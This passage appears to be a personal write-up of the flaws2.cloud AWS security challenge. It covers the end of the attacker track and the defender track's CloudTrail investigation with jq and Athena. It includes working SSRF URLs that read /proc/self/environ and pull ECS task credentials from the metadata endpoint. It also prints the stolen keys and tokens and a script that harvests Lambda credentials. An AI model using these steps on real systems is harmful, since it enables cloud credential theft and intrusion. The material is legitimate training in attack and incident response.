"Cluster":"arn:aws:ecs:us-east-1:653711331788:cluster/level3",
"TaskARN":"arn:aws:ecs:us-east-1:653711331788:task/2742123a-ed28-4a62-b08b-8cc33d932f26",
"Family":"level3",
"Revision":"3",
"DesiredStatus":"RUNNING",
"KnownStatus":"RUNNING",
"Containers":[
{
"DockerId":"022f0bb003e003d3ef080d6151ff72214a3f46a7f693439ee2f7a1ae11eed956",
"Name":"~internal~ecs~pause",
"DockerName":"ecs-level3-3-internalecspause-eca0cefcdde9c18b5d00",
"Image":"fg-proxy:tinyproxy",
"ImageID":"",
"Labels":{
"com.amazonaws.ecs.cluster":"arn:aws:ecs:us-east-1:653711331788:cluster/level3",
"com.amazonaws.ecs.container-name":"~internal~ecs~pause",
"com.amazonaws.ecs.task-arn":"arn:aws:ecs:us-east-1:653711331788:task/2742123a-ed28-4a62-b08b-8cc33d932f26",
"com.amazonaws.ecs.task-definition-family":"level3",
"com.amazonaws.ecs.task-definition-version":"3"
},
"DesiredStatus":"RESOURCES_PROVISIONED",
"KnownStatus":"RESOURCES_PROVISIONED",
"Limits":{"CPU":0, "Memory":0},
"CreatedAt":"2020-10-15T03:00:38.261874402Z",
"StartedAt":"2020-10-15T03:00:39.320526836Z",
"Type":"CNI_PAUSE",
"Networks":[ {"NetworkMode":"awsvpc", "IPv4Addresses":["172.31.60.122"]}]
},
{
"DockerId":"4d1e5f7ba388ca5e9aa7143fc4279078ec1f039d604d1ef09c726397e166c49f",
"Name":"level3",
"DockerName":"ecs-level3-3-level3-ccb4b080ebe3bfe8c901",
"Image":"653711331788.dkr.ecr.us-east-1.amazonaws.com/level2",
"ImageID":"sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621",
"Labels":{
"com.amazonaws.ecs.cluster":"arn:aws:ecs:us-east-1:653711331788:cluster/level3",
"com.amazonaws.ecs.container-name":"level3",
"com.amazonaws.ecs.task-arn":"arn:aws:ecs:us-east-1:653711331788:task/2742123a-ed28-4a62-b08b-8cc33d932f26",
"com.amazonaws.ecs.task-definition-family":"level3",
"com.amazonaws.ecs.task-definition-version":"3"
},
"DesiredStatus":"RUNNING",
"KnownStatus":"RUNNING",
"Limits":{"CPU":0, "Memory":0},
"CreatedAt":"2020-10-15T03:00:46.424280771Z",
"StartedAt":"2020-10-15T03:00:50.024889381Z",
"Type":"NORMAL",
"Networks":[{"NetworkMode":"awsvpc", "IPv4Addresses":["172.31.60.122"]}],
"Health":{
"status":"UNHEALTHY",
"statusSince":"2020-10-15T03:01:50.720417705Z",
"exitCode":-1,
"output":"OCI runtime exec failed: exec failed: container_linux.go:349: starting container process caused "exec: \\"exit 0\\": executable file not found in $PATH": unknown"
}
}
],
"Limits":{"CPU":0.25, "Memory":512},
"PullStartedAt":"2020-10-15T03:00:39.500173195Z",
"PullStoppedAt":"2020-10-15T03:00:46.409668199Z"
}
# there are actually 2 containers, the top one being Fargate’s Internal ECS Pause Container
- creds for the Task’s IAM Role aren’t just sitting there in the metadata like for EC2.
- Containers running via ECS on AWS have their creds at
169.254.170.2/v2/credentials/GUID
where the GUID is found from an environment variable
AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
- With ECS Fargate, each container has an environment variable
$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
- which contains the URI to retrieve these, which has some randomness in it.
retrieving environment variables from linux’ “magic” proc filesystem, at /proc/self/environ
- From inside a container, we could query the credentials using with the following command:
curl 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
- Containers running via ECS on AWS have their creds at
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root@e247007162e8:/var/www/html# cat /proc/self/environ
# HOSTNAME=e247007162e8TERM=xtermOLDPWD=/LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binPWD=/var/www/htmlSHLVL=1HOME=/root_=/bin/cat
root@e247007162e8:/var/www/html# cat /proc/self/environ | tr “\000” “
https://container.target.flaws2.cloud/proxy/file:///proc/self/environ
# HOSTNAME=ip-172-31-60-122.ec2.internal
# HOME=/root
# AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/f39e12f6-f9aa-4a24-a46c-c6faf3071770
# AWS_EXECUTION_ENV=AWS_ECS_FARGATE
# AWS_DEFAULT_REGION=us-east-1
# ECS_CONTAINER_METADATA_URI_V4=https://169.254.170.2/v4/fea89204-6362-4166-8382-a0b00bc75f4f
# ECS_CONTAINER_METADATA_URI=https://169.254.170.2/v3/fea89204-6362-4166-8382-a0b00bc75f4f
# PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# AWS_REGION=us-east-1
# PWD=/
https://container.target.flaws2.cloud/proxy/https://169.254.170.2/v2/credentials/GUID
# {"code":"InvalidIdInRequest","message":"CredentialsV2Request: Credentials not found","HTTPErrorCode":400}
https://container.target.flaws2.cloud/proxy/https://169.254.170.2/v2/credentials/f39e12f6-f9aa-4a24-a46c-c6faf3071770
# {
# "RoleArn":"arn:aws:iam::653711331788:role/level3",
# "AccessKeyId":"ASIAZQNB3KHGC65V4W6M",
# "SecretAccessKey":"KGNtE8jM/RquOkzCzlVkbG1DEwSkAhHmGHsNYcdi",
# "Token":"IQoJb3JpZ2luX2VjEFIaCXVzLWVhc3QtMSJIMEYCIQCMuZj+m50efHqe0UhHbGvdcNjZ7n02hhiSU4QsPXNogQIhAL2lz7V8cvfrnDyaNtpbHlSfJSSI+utsoWIcnDWO/3sHKqIDCDsQAhoMNjUzNzExMzMxNzg4Igx5XPdNwsU3TkH7Jwkq/wKZkxSJ3IDwAxY+ID/Plqi/GpB94uarLhT2aSX05nO9R5D3wgYvgWz3GpPqHndxJh5WYlPgFxDXO/NkgQ7n0j18JIunwlZhZsv+lWwJ+xRQDMvFftyWoRXfX9W4il4FkGYHMYYcJOLhUak8HL3iK+e/2aXyHYzEjAYosJ1NZ8JtJc+N1isimx4YRockT7+OzTaVKxgQ3FPn5vwd3O+LY5bOby0sZ8FWmLSSk9cSl0yLNYCx9ZKtNboGzFGOR7s1TkcnoP/nKjz5h0BENj+HuuTD4bp54k+6S064g6qJp1kWOQoufbqiIhnWexH9Z0JHH7kp7Q1Beu/jiwxGGR6HCVZnx0QaCEphHB2VQ3YR/ciTmeajHzuRRQoZKw8Ge+x0BAAQor96kmI1nJSC5VFmA82y8IqeXZckOTniGvuT+g+i+NjrltVP6DcyNEA9Yk3XEjjULYT8AaVlfrxfIwF0goNkja6GzKEqk1cbmFbnq5ELG6lIa8vchmUjuv/1HihPDzCVlMOABjrqATzAiePLSs5IvHVyms++wnsbVaWjws0uM2KTADAN9FrIZy+CCsI069Y5xuipEyYLij7YUvEdW6pXQip/5198EFTNsj8qIughvPltA8ifHNYHmBjeo7qZkURDVzQTiMTDDKIMIqK+RgaVupnaI5DHoDTD4/+VXT4JJyjCESRPSVyCdx/+n45/Apxn4A7sVPYss8FDYu7DgzmYu6W84B0mE4n1VlT8yZyO56kZkBaIljssxfQwtXT6J0E+sj7fT6G7vFbTyaLlzxOmXSiZ2b9hWBNSDy8GcvtIlitEW5ByT53Y8M5oKBcIDcziCA==",
# "Expiration":"2021-01-27T08:04:05Z"
# }
- get the iam
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
aws sts get-caller-identity \
--profile flaws3
# {
# "UserId": "AROAJQMBDNUMIKLZKMF64:2742123a-ed28-4a62-b08b-8cc33d932f26",
# "Account": "653711331788",
# "Arn": "arn:aws:sts::653711331788:assumed-role/level3/2742123a-ed28-4a62-b08b-8cc33d932f26"
# }
# the role doesn’t have IAM permissions to query,
aws s3 ls \
--profile flaws3
# 2018-11-20 14:50:08 flaws2.cloud
# 2018-11-20 13:45:26 level1.flaws2.cloud
# 2018-11-20 20:41:16 level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud
# 2018-11-26 14:47:22 level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud
# 2018-11-27 15:37:27 the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud
https://the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud/
Defender Track
Welcome Defender! As an incident responder we’re granting you access to the AWS account called “Security” as an IAM user.
- This account contains a copy of the logs during the time period of the incident
- and has the ability to assume into the “Security” role in the target account
- so you can look around to spot the misconfigurations that allowed for this attack to happen.
Credentials
Your IAM credentials to the Security account:
1
2
3
4
5
6
Login: https://flaws2-security.signin.aws.amazon.com/console
Account ID: 322079859186
Username: security
Password: password
Access Key: AKIAIUFNQ2WCOPTEITJQ
Secret Key: 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
Environment
The credentials above
- give you access to the Security account, which can assume the role “security” in the Target account.
- also have access to an S3 bucket, named flaws2_logs, in the Security account that, that contains the CloudTrail logs recorded during a successful compromise from the Attacker track.
Objective 1: Download CloudTrail logs
- Setup CLI
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# download the CloudTrail logs.
# configuring the AWS CLI or try using aws-vault as it avoids storing the keys in plain-text in your home directory like the AWS CLI does, so it helps avoid a common source of key leakage.
# Ensure this worked by running:
aws sts get-caller-identity \
--profile flawsd
# {
# "UserId": "AIDAJXZBU42TNFRNGBBFI",
# "Account": "322079859186",
# "Arn": "arn:aws:iam::322079859186:user/security"
# }
# list the buckets in the account (aws s3 ls), and you'll get back flaws2-logs.
aws s3 ls \
--profile flawsd
# 2018-11-19 15:54:31 flaws2-logs
- Download the logs
1
2
3
4
5
6
7
8
9
# download the CloudTrail logs with:
aws s3 sync s3://flaws2-logs . \
--profile flawsd
# get .json.gz files
# path AWSLogs/653711331788/CloudTrail/us-east-1/2018/11/28/.
# These are the CloudTrail logs for a successful hack.
# This S3 bucket is public so that you can reference it from Athena later.
Objective 2: Access the Target account
A common best practice of AWS setup
- have a separate Security account that contains the CloudTrail logs from all other AWS accounts and also has some sort of access into the other accounts to check up on things.
- For this objective
- access the Target account through the IAM role that grants the Security account access.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# ~/.aws/config
[profile security]
region=us-east-1
output=json
# add a profile for the target to that file:
[profile target_security]
region=us-east-1
output=json
source_profile = security
role_arn = arn:aws:iam::653711331788:role/security
# now run:
# account ID is 322079859186, running in the security account,
# when it is 653711331788, running in the context of the target account.
aws sts get-caller-identity \
--profile flawd
# {
# "UserId": "AIDAJXZBU42TNFRNGBBFI",
# "Account": "322079859186",
# "Arn": "arn:aws:iam::322079859186:user/security"
# }
aws sts get-caller-identity \
--profile target_security
# {
# "UserId": "AROAIKRY5GULQLYOGRMNS:botocore-session-1611721710",
# "Account": "653711331788",
# "Arn": "arn:aws:sts::653711331788:assumed-role/security/botocore-session-1611721710"
# }
# the S3 buckets for the levels of the Attacker path.
aws s3 ls \
--profile target_security
# 2018-11-20 14:50:08 flaws2.cloud
# 2018-11-20 13:45:26 level1.flaws2.cloud
# 2018-11-20 20:41:16 level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud
# 2018-11-26 14:47:22 level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud
# 2018-11-27 15:37:27 the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud
Objective 3: Use jq
digging into the log data
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
# have jq installed
# All the logs are in AWSLogs/653711331788/CloudTrail/us-east-1/2018/11/28/, but often you will have CloudTrail logs in lots of subdirectories, so it's helpful to be able to act on them all at once.
# Assuming your current working directory is inside a folder where you downloaded these files, and you don't have anything else there, gunzip the files by running the following, which will find all the files in every subdirectory, recursively, and attempt to gunzip them.:
cd AWSLogs/653711331788/CloudTrail/us-east-1/2018/11/28
find . -type f -exec gunzip {} \;
# cat them through jq with:
find . -type f -exec cat {} \; | jq '.'
# You should see nicely formatting json data
# let's just see the event names. Replace the jq query in the command above to:
find . -type f -exec cat {} \; | jq '.Records[].eventName'
# You should see:
# ...
# "GetObject"
# "GetObject"
# "GetObject"
# "GetObject"
# "ListBuckets"
# "AssumeRole"
# "AssumeRole"
# These are slightly out of order, so let's include the time
# The -cr prints the data in a row
# the |@tsv makes this tab separated.
# Then it gets sorted by the time since that's the first colunm.
find . -type f -exec cat {} \; | jq -cr '.Records[]|[.eventTime, .eventName]|@tsv' | sort
# ...
# 2018-11-28T23:06:33Z GetDownloadUrlForLayer
# 2018-11-28T23:07:08Z GetObject
# 2018-11-28T23:07:08Z GetObject
# 2018-11-28T23:09:28Z ListBuckets
# 2018-11-28T23:09:36Z GetObject
# 2018-11-28T23:09:36Z GetObject
# Extending that even further, we can replace the jq part with:
find . -type f -exec cat {} \; | jq -cr '.Records[]|[.eventTime, .sourceIPAddress, .userIdentity.arn, .userIdentity.accountId, .userIdentity.type, .eventName]|@tsv' | sort
# then copy that into Excel or another spreadsheet which can sometimes make the data easier to work with.
2018-11-28T22:31:59Z ecs-tasks.amazonaws.com AWSService AssumeRole
2018-11-28T22:31:59Z ecs-tasks.amazonaws.com AWSService AssumeRole
2018-11-28T23:02:56Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:02:56Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:02:56Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:02:56Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:02:57Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:08Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:08Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:08Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:08Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:08Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:11Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:11Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:12Z 34.234.236.212 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole CreateLogStream
2018-11-28T23:03:12Z lambda.amazonaws.com AWSService AssumeRole
2018-11-28T23:03:13Z 34.234.236.212 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole CreateLogStream
2018-11-28T23:03:13Z apigateway.amazonaws.com AWSService Invoke
2018-11-28T23:03:14Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:17Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:18Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:03:20Z 34.234.236.212 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole CreateLogStream
2018-11-28T23:03:20Z apigateway.amazonaws.com AWSService Invoke
2018-11-28T23:03:35Z 34.234.236.212 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole CreateLogStream
2018-11-28T23:03:50Z 34.234.236.212 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole CreateLogStream
2018-11-28T23:04:54Z 104.102.221.250 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole ListObjects
2018-11-28T23:05:10Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:05:12Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:05:12Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:05:53Z 104.102.221.250 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole ListImages
2018-11-28T23:06:17Z 104.102.221.250 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole BatchGetImage
2018-11-28T23:06:33Z 104.102.221.250 arn:aws:sts::653711331788:assumed-role/level1/level1 653711331788 AssumedRole GetDownloadUrlForLayer
2018-11-28T23:07:08Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:07:08Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:09:28Z 104.102.221.250 arn:aws:sts::653711331788:assumed-role/level3/d190d14a-2404-45d6-9113-4eda22d7f2c7 653711331788 AssumedRole ListBuckets
2018-11-28T23:09:36Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
2018-11-28T23:09:36Z 104.102.221.250 ANONYMOUS_PRINCIPAL AWSAccount GetObject
# These logs mostly contain the attack,
# but you'll notice also logs for "AWSService" events as the Lambda and ECS resources obtained their roles.
# These are logs basically about how AWS works, and not any actions anyone did.
# There are also a lot of ANONYMOUS_PRINCIPAL, which are calls that did not involve an AWS principal. In this case, these are S3 requests from a web browser.
# If you look at the user-agent data (.userAgent) you'll see them as Chrome, as opposed to the AWS CLI.
Objective 4: Identify credential theft
focusing in on the ListBuckets call which can be found by using the jq query:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
# 23:09:28Z 104.102.221.250 arn:aws:sts::653711331788:assumed-role/level3/d190d14a-2404-45d6-9113-4eda22d7f2c7 653711331788 AssumedRole ListBuckets
# Let's work our way backward through the hack by first
find . -type f -exec cat {} \; | jq '.Records[]|select(.eventName=="ListBuckets")'
# {
# "eventVersion": "1.05",
# "userIdentity": {
# "type": "AssumedRole",
# "principalId": "AROAJQMBDNUMIKLZKMF64:d190d14a-2404-45d6-9113-4eda22d7f2c7",
# "arn": "arn:aws:sts::653711331788:assumed-role/level3/d190d14a-2404-45d6-9113-4eda22d7f2c7",
# "accountId": "653711331788",
# "accessKeyId": "ASIAZQNB3KHGNXWXBSJS",
# "sessionContext": {
# "attributes": {
# "mfaAuthenticated": "false",
# "creationDate": "2018-11-28T22:31:59Z"
# },
# "sessionIssuer": {
# "type": "Role",
# "principalId": "AROAJQMBDNUMIKLZKMF64",
# "arn": "arn:aws:iam::653711331788:role/level3",
# "accountId": "653711331788",
# "userName": "level3"
# }
# }
# },
# "eventTime": "2018-11-28T23:09:28Z",
# "eventSource": "s3.amazonaws.com",
# "eventName": "ListBuckets",
# "awsRegion": "us-east-1",
# "sourceIPAddress": "104.102.221.250",
# "userAgent": "[aws-cli/1.16.19 Python/2.7.10 Darwin/17.7.0 botocore/1.12.9]",
# "requestParameters": null,
# "responseElements": null,
# "requestID": "4698593B9338B27F",
# "eventID": "65e111a0-83ae-4ba8-9673-16291a804873",
# "eventType": "AwsApiCall",
# "recipientAccountId": "653711331788"
# }
# the IP here is 104.102.221.250 which is not an Amazon owned IP, We'll view this IP as the attacker's IP.
# This call came from the role level3, so let's look at that:
aws iam get-role \
--role-name level3 \
--profile target_security
# {
# "Role": {
# "Description": "Allows ECS tasks to call AWS services on your behalf.",
# "AssumeRolePolicyDocument": {
# "Version": "2012-10-17",
# "Statement": [
# {
# "Action": "sts:AssumeRole",
# "Principal": { "Service": "ecs-tasks.amazonaws.com" },
# "Effect": "Allow",
# "Sid": ""
# }
# ]
# },
# "MaxSessionDuration": 3600,
# "RoleId": "AROAJQMBDNUMIKLZKMF64",
# "CreateDate": "2018-11-23T17:55:27Z",
# "RoleName": "level3",
# "Path": "/",
# "Arn": "arn:aws:iam::653711331788:role/level3"
# }
# }
# this role is only supposed to be run by the ECS service, as the AssumeRolePolicyDocument is only allowing that Principal,
# but we just saw this IP clearly did not come from the AWS IP space
# We don't have logs from the webserver that is running the ECS container
# but we can assume from this one log event that it must have been hacked.
# Normally, you'd see the resource (the ECS in this case) having made AWS API calls from it's own IP that you could then compare against any new IPs it may have made.
# Using this concept is explained by Will Bengston in his talk Detecting Credential Compromise in AWS.
Objective 5: Identify the public resource
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
# Looking at earlier events from the CloudTrail logs, we'll see level1 calling ListImages, BatchGetImage, and GetDownloadUrlForLayer.
# Again, this is a compromised session credential, but we also want to see what happened here.
# Let's work our way backward through the hack by first
find . -type f -exec cat {} \; | jq '.Records[]|select(.eventName=="ListImages")'
# {
# "eventVersion": "1.04",
# "userIdentity": {
# "type": "AssumedRole",
# "principalId": "AROAIBATWWYQXZTTALNCE:level1",
# "arn": "arn:aws:sts::653711331788:assumed-role/level1/level1",
# "accountId": "653711331788",
# "accessKeyId": "ASIAZQNB3KHGIGYQXVVG",
# "sessionContext": {
# "attributes": { "mfaAuthenticated": "false",
# "creationDate": "2018-11-28T23:03:12Z" },
# "sessionIssuer": { "type": "Role",
# "principalId": "AROAIBATWWYQXZTTALNCE",
# "arn": "arn:aws:iam::653711331788:role/service-role/level1",
# "accountId": "653711331788",
# "userName": "level1" }
# }
# },
# "eventTime": "2018-11-28T23:05:53Z",
# "eventSource": "ecr.amazonaws.com",
# "eventName": "ListImages",
# "awsRegion": "us-east-1",
# "sourceIPAddress": "104.102.221.250",
# "userAgent": "aws-cli/1.16.19 Python/2.7.10 Darwin/17.7.0 botocore/1.12.9",
# "requestParameters": { "repositoryName": "level2",
# "registryId": "653711331788" },
# "responseElements": null,
# "requestID": "2780d808-f362-11e8-b13e-dbd4ed9d7936",
# "eventID": "eb0fa4a0-580f-4270-bd37-7e45dfb217aa",
# "resources": [ { "ARN": "arn:aws:ecr:us-east-1:653711331788:repository/level2",
# "accountId": "653711331788" } ],
# "eventType": "AwsApiCall",
# "recipientAccountId": "653711331788"
# }
# We can see the ListImages call event contains "repositoryName": "level2"
# We can check the policy by running:
aws ecr get-repository-policy \
--repository-name level2 \
--profile target_security
# {
# "registryId": "653711331788",
# "repositoryName": "level2",
# "policyText": "{\n \"Version\" : \"2008-10-17\",\n \"Statement\" : [ {\n \"Sid\" : \"AccessControl\",\n \"Effect\" : \"Allow\",\n \"Principal\" : \"*\",\n \"Action\" : [ \"ecr:GetDownloadUrlForLayer\", \"ecr:BatchGetImage\", \"ecr:BatchCheckLayerAvailability\", \"ecr:ListImages\", \"ecr:DescribeImages\" ]\n } ]\n}"
# }
# clean that up
aws ecr get-repository-policy \
--repository-name level2 \
--profile target_security | jq '.policyText|fromjson'
# {
# "Version": "2008-10-17",
# "Statement": [
# {
# "Sid": "AccessControl",
# "Effect": "Allow",
# "Principal": "*",
# "Action": [
# "ecr:GetDownloadUrlForLayer",
# "ecr:BatchGetImage",
# "ecr:BatchCheckLayerAvailability",
# "ecr:ListImages",
# "ecr:DescribeImages"
# ]
# }
# ]
# }
# Principal is "*": these actions are public to the world to perform, which means this ECR is public.
# Ideally, you'd use a tool like CloudMapper to scan an account for public resources like this before you trace back an attack
Objective 6: Use Athena
Athena is great for incident response
- because you don’t have to wait for the data to load anywhere,
- just define the table in Athena and start querying it.
- should also create partitions which will reduce costs by helping query only against a specific day.
exploring the logs in a similar as jq, by using the AWS Service Athena.
- In the query editor, run:
1
create database flaws2;
- Switch to the flaws2 database just created and run:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
CREATE EXTERNAL TABLE `cloudtrail`( `eventversion` string COMMENT 'from deserializer', `useridentity` struct<type:string,principalid:string,arn:string,accountid:string,invokedby:string,accesskeyid:string,username:string,sessioncontext:struct<attributes:struct<mfaauthenticated:string,creationdate:string>,sessionissuer:struct<type:string,principalid:string,arn:string,accountid:string,username:string>>> COMMENT 'from deserializer', `eventtime` string COMMENT 'from deserializer', `eventsource` string COMMENT 'from deserializer', `eventname` string COMMENT 'from deserializer', `awsregion` string COMMENT 'from deserializer', `sourceipaddress` string COMMENT 'from deserializer', `useragent` string COMMENT 'from deserializer', `errorcode` string COMMENT 'from deserializer', `errormessage` string COMMENT 'from deserializer', `requestparameters` string COMMENT 'from deserializer', `responseelements` string COMMENT 'from deserializer', `additionaleventdata` string COMMENT 'from deserializer', `requestid` string COMMENT 'from deserializer', `eventid` string COMMENT 'from deserializer', `resources` array<struct<arn:string,accountid:string,type:string>> COMMENT 'from deserializer', `eventtype` string COMMENT 'from deserializer', `apiversion` string COMMENT 'from deserializer', `readonly` string COMMENT 'from deserializer', `recipientaccountid` string COMMENT 'from deserializer', `serviceeventdetails` string COMMENT 'from deserializer', `sharedeventid` string COMMENT 'from deserializer', `vpcendpointid` string COMMENT 'from deserializer') ROW FORMAT SERDE 'com.amazon.emr.hive.serde.CloudTrailSerde' STORED AS INPUTFORMAT 'com.amazon.emr.cloudtrail.CloudTrailInputFormat' OUTPUTFORMAT 'org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat' LOCATION 's3://flaws2-logs/AWSLogs/653711331788/CloudTrail';
- now run:
select eventtime, eventname from cloudtrail;
run normal SQL queries against this data
SELECT eventname, count(*) AS mycount FROM cloudtrail GROUP BY eventname ORDER BY mycount;
script
reobtain the credential
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# A python2 utility “crudini”
pip2 install — user crudini
# jq — awesome json processor
brew install jq
vim run.sh
#!/bin/bash
INFILE=~/.aws/credentials
PROFILE='flaws2'
res=`curl -s 'https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=x' | tail -n1`
AWS_ACCESS_KEY_ID=`echo $res | jq -r .AWS_ACCESS_KEY_ID`
AWS_SECRET_ACCESS_KEY=`echo $res | jq -r .AWS_SECRET_ACCESS_KEY`
AWS_SESSION_TOKEN=`echo $res | jq -r .AWS_SESSION_TOKEN`
AWS_REGION=`echo $res | jq -r .AWS_REGION`
echo "[$PROFILE]
REGION = $AWS_REGION
AWS_ACCESS_KEY_ID = $AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY = $AWS_SECRET_ACCESS_KEY
AWS_SESSION_TOKEN = $AWS_SESSION_TOKEN
" | crudini --merge $INFILE
echo "Set creds for profile $PROFILE in $INFILE"
Comments powered by Disqus.